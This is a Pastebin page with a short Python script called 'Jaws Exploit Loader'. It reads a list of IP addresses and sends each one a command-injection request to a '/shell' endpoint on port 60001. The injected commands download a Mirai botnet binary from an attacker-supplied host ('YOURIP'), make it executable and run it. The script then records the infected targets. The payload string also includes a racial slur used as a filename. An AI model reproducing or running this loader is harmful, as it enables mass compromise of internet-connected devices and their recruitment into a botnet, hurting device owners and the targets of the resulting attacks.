Advertisement
D3adG

jaws loader

May 10th, 2024
594
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.30 KB | None | 0 0
  1. #Jaws Exploit Loader
  2. import random, socket, time, sys, requests, re, os
  3. from multiprocessing import Process
  4.  
  5. if len(sys.argv) < 2:
  6.     sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))
  7.  
  8. bin_names = ["arm", "arm4", "arm5"]
  9. list = open(sys.argv[1], "r").readlines()
  10. #port= sys.argv[2]
  11.  
  12. def send_payload(target, port):
  13.     for names in bin_names:
  14.         print("[JAWS/1.0] attempting to infect %s with bin %s" % (target, names))
  15.         url = "http://" + target+":60001/shell?echo >NiGGeR_ || cd /var; echo >NiGGeR_; cp /bin/busybox flakka; >flakka; chmod 777 flakka; wget http://YOURIP/binarizz/mirai.%s -O flakka; chmod 777 flakka;./flakka; rm -rf flakka >/dev/null 2>&1" % (names)
  16.         try:
  17.             output = requests.get(url, timeout=3)
  18.             if output.status_code == int('200'):
  19.                 print("[JAWS/1.0] infected %s" % (target))
  20.                 file_h = open("jaws_infected.txt", "a+")
  21.                 file_h.write(target + "\n")
  22.                 file_h.close()
  23.                 break
  24.         except:
  25.             pass
  26.  
  27. for i in open(sys.argv[1]).readlines():
  28.     try:
  29.         i = i.strip("\r\n")
  30.         t = Process(target=send_payload, args=(i,port,))
  31.         t.start()
  32.     except KeyboardInterrupt:
  33.         os.kill(os.getpid(), 9)
  34.     except:
  35.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement